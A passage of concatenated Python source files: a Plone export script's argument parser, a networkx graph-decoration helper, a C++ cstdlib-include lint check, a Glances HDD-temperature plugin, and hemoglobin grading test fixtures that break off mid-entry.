help='full path to site root (default: Plone)')
parser.add_argument(
'-u',
dest='username',
default='admin',
help='zope admin username (default: admin)')
parser.add_argument(
'-o',
dest='outputfile',
default='',
help='output zip file name (default: SITEPATH.zip)')
args, unknown = parser.parse_known_args()
if args.outputfile == '':
args.outputfile = args.sitepath + ".zip"
main = Main(args)
main()
|
"""
pyblk._decorations._decorations
===============================
Tools to decorate networkx graphs in situ, i.e., as
constructed rather than as read from a textual file.
.. moduleauthor:: mulhern <amulhern@redhat.com>
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import networkx as nx
class Decorator(object):
"""
Decorate graph elements with attributes.
"""
@staticmethod
def _decorate(graph, properties, setter=nx.set_node_attributes):
"""
Decorate the graph.
:param `DiGraph` graph: the graph
:param properties: a dict of properties
:type properties: dict of property name -> graph element -> value
:param setter: a function to set the attributes
:type setter: function (one of networkx.set_{node, edge}_attributes)
"""
for property_name, value in properties.items():
setter(graph, property_name, value)
@classmethod
def decorate_nodes(cls, graph, properties):
"""
Decorate the graph.
:param `DiGraph` graph: the graph
:param properties: a dict of properties
:type properties: dict of property name -> graph element -> value
"""
cls._decorate(graph, properties, nx.set_node_attributes)
@classmethod
def decorate_edges(cls, graph, properties):
"""
Decorate the graph.
:param `DiGraph` graph: the graph
:param properties: a dict of properties
:type properties: dict of property name -> graph element -> value
"""
cls._decorate(graph, properties, nx.set_edge_attributes)
|
"""Checks that cstdlib is included for some of its functions that we use
commonly.
Older Macs that build with libc++ instead of libstc++ need this.
"""
import re
FUNCTION_REGEX = re.compile(
r"""((\s|std::|\(|\[)(abs|ato[fil]|atoll|strto[dfl]|strtol[ld]|strtoul[l]{0,1}|malloc|getenv)|(\bstd::[s]{0,1}rand))\(""")
def does_include_cstdlib(lines, fn):
includes_cstdlib = False
for lineno, line in enumerate(lines, 1):
if line.startswith('#include <cstdlib>'):
includes_cstdlib = True
matches = []
for match in FUNCTION_REGEX.findall(line):
matches.append(match[0].strip())
if matches and not includes_cstdlib:
return [(fn, lineno,
'This file uses ' + ', '.join(matches) + ' but does not include <cstdlib>.')]
return []
evaluate_matches = does_include_cstdlib
allowed = [
"""#include <cstdlib>
std::abs(-5);
""",
"""#include <cstdlib>
std::strtoull;
""",
"""
uint32_t const hit = game.logic_rand() % 100;
""",
"""
uint32_t rand();
"""
]
forbidden = [
"""
const long int x = strtol(endp, &endp, 0);
""",
"""
std::abs(-5);
""",
"""
std::abs(-5);
""",
"""
std::strtoull(endp, &endp, 0);
""",
"""
std::strtoull(endp, &endp, 0);
""",
]
|
"""HDD temperature plugin."""
import os
import socket
from ocglances.compat import nativestr, range
from ocglances.logger import logger
from ocglances.plugins.glances_plugin import GlancesPlugin
class Plugin(GlancesPlugin):
"""Glances HDD temperature sensors plugin.
stats is a list
"""
def __init__(self, args=None):
"""Init the plugin."""
super(Plugin, self).__init__(args=args)
# Init the sensor class
self.glancesgrabhddtemp = GlancesGrabHDDTemp(args=args)
# We do not want to display the stat in a dedicated area
# The HDD temp is displayed within the sensors plugin
self.display_curse = False
# Init stats
self.reset()
def reset(self):
"""Reset/init the stats."""
self.stats = []
@GlancesPlugin._check_decorator
@GlancesPlugin._log_result_decorator
def update(self):
"""Update HDD stats using the input method."""
# Reset stats
self.reset()
if self.input_method == 'local':
# Update stats using the standard system lib
self.stats = self.glancesgrabhddtemp.get()
else:
# Update stats using SNMP
# Not available for the moment
pass
return self.stats
class GlancesGrabHDDTemp(object):
"""Get hddtemp stats using a socket connection."""
def __init__(self, host='127.0.0.1', port=7634, args=None):
"""Init hddtemp stats."""
self.args = args
self.host = host
self.port = port
self.cache = ""
self.reset()
def reset(self):
"""Reset/init the stats."""
self.hddtemp_list = []
def __update__(self):
"""Update the stats."""
# Reset the list
self.reset()
# Fetch the data
# data = ("|/dev/sda|WDC WD2500JS-75MHB0|44|C|"
# "|/dev/sdb|WDC WD2500JS-75MHB0|35|C|"
# "|/dev/sdc|WDC WD3200AAKS-75B3A0|45|C|"
# "|/dev/sdd|WDC WD3200AAKS-75B3A0|45|C|"
# "|/dev/sde|WDC WD3200AAKS-75B3A0|43|C|"
# "|/dev/sdf|???|ERR|*|"
# "|/dev/sdg|HGST HTS541010A9E680|SLP|*|"
# "|/dev/sdh|HGST HTS541010A9E680|UNK|*|")
data = self.fetch()
# Exit if no data
if data == "":
return
# Safety check to avoid malformed data
# Considering the size of "|/dev/sda||0||" as the minimum
if len(data) < 14:
data = self.cache if len(self.cache) > 0 else self.fetch()
self.cache = data
try:
fields = data.split(b'|')
except TypeError:
fields = ""
devices = (len(fields) - 1) // 5
for item in range(devices):
offset = item * 5
hddtemp_current = {}
device = os.path.basename(nativestr(fields[offset + 1]))
temperature = fields[offset + 3]
unit = nativestr(fields[offset + 4])
hddtemp_current['label'] = device
try:
hddtemp_current['value'] = float(temperature)
except ValueError:
# Temperature could be 'ERR', 'SLP' or 'UNK' (see issue #824)
# Improper bytes/unicode in glances_hddtemp.py (see issue #887)
hddtemp_current['value'] = nativestr(temperature)
hddtemp_current['unit'] = unit
self.hddtemp_list.append(hddtemp_current)
def fetch(self):
"""Fetch the data from hddtemp daemon."""
# Taking care of sudden deaths/stops of hddtemp daemon
try:
sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sck.connect((self.host, self.port))
data = sck.recv(4096)
except socket.error as e:
logger.debug("Cannot connect to an HDDtemp server ({}:{} => {})".format(self.host, self.port, e))
logger.debug("Disable the HDDtemp module. Use the --disable-hddtemp to hide the previous message.")
if self.args is not None:
self.args.disable_hddtemp = True
data = ""
finally:
sck.close()
return data
def get(self):
"""Get HDDs list."""
self.__update__()
return self.hddtemp_list
|
from datetime import date, timedelta
"Test Cases Start-HEMOGLOBIN"
DAYS_TO_SUBTRACT_1 = 58
G1_TEST_1 = {'result_value': 8.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_2 = {'result_value': 8.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_3 = {'result_value': 10.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_4 = {'result_value': 10.059, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_5 = {'result_value': 9.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_6 = {'result_value': 11.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_1 = {'result_value': 7.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_2 = {'result_value': 7.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_3 = {'result_value': 8.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_4 = {'result_value': 8.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_5 = {'result_value': 8.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_6 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_1 = {'result_value': 6.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_2 = {'result_value': 6.559, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_3 = {'result_value': 7.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_4 = {'result_value': 7.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_5 = {'result_value': 7.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_6 = {'result_value': 8.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_1 = {'result_value': 6.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_2 = {'result_value': 6.559, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_3 = {'result_value': 7.4444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_4 = {'result_value': 5.0000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_25 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_26 = {'result_value': 10.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_27 = {'result_value': 10.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_28 = {'result_value': 10.955, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_29 = {'result_value': 10.555, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_30 = {'result_value': 11.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_25 = {'result_value': 8.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_26 = {'result_value': 8.959, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_27 = {'result_value': 9.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_28 = {'result_value': 9.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_29 = {'result_value': 9.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_30 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_25 = {'result_value': 6.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_26 = {'result_value': 6.959, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_27 = {'result_value': 8.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_28 = {'result_value': 8.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_29 = {'result_value': 8.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_30 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_17 = {'result_value': 6.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_18 = {'result_value': 7.059, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_19 = {'result_value': 7.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_20 = {'result_value': 6.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
DAYS_TO_SUBTRACT_2 = 40
G1_TEST_7 = {'result_value': 8.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_8 = {'result_value': 8.455, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_9 = {'result_value': 9.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_10 = {'result_value': 9.455, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_11 = {'result_value': 9.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_12 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_7 = {'result_value': 6.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_8 = {'result_value': 7.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_9 = {'result_value': 8.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_10 = {'result_value': 8.455, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_11 = {'result_value': 8.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_12 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_7 = {'result_value': 5.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_8 = {'result_value': 6.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_9 = {'result_value': 6.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_10 = {'result_value': 6.955, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_11 = {'result_value': 6.911, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_12 = {'result_value': 7.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_5 = {'result_value': 5.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_6 = {'result_value': 6.155, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_7 = {'result_value': 6.054, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_8 = {'result_value': 5.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
DAYS_TO_SUBTRACT_3 = 30
G1_TEST_13 = {'result_value': 9.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_14 = {'result_value': 9.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_15 = {'result_value': 10.544, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_16 = {'result_value': 10.551, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_17 = {'result_value': 9.777, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_18 = {'result_value': 11.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_13 = {'result_value': 7.914, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_14 = {'result_value': 8.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_15 = {'result_value': 9.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_16 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_17 = {'result_value': 9.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_18 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_13 = {'result_value': 6.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_14 = {'result_value': 7.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_15 = {'result_value': 7.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_16 = {'result_value': 7.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_17 = {'result_value': 7.511, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_18 = {'result_value': 8.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_9 = {'result_value': 6.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_10 = {'result_value': 7.059, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_11 = {'result_value': 7.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_12 = {'result_value': 6.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
DAYS_TO_SUBTRACT_4 = 20
G1_TEST_19 = {'result_value': 11.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_20 = {'result_value': 11.959, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_21 = {'result_value': 13.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_22 = {'result_value': 13.055, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_23 = {'result_value': 12.777, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_24 = {'result_value': 13.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_19 = {'result_value': 9.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_20 = {'result_value': 9.955, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_21 = {'result_value': 11.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_22 = {'result_value': 11.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_23 = {'result_value': 10.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_24 = {'result_value': 12.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_19 = {'result_value': 8.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_20 = {'result_value': 8.955, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_21 = {'result_value': 9.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_22 = {'result_value': 9.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_23 = {'result_value': 9.511, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_24 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
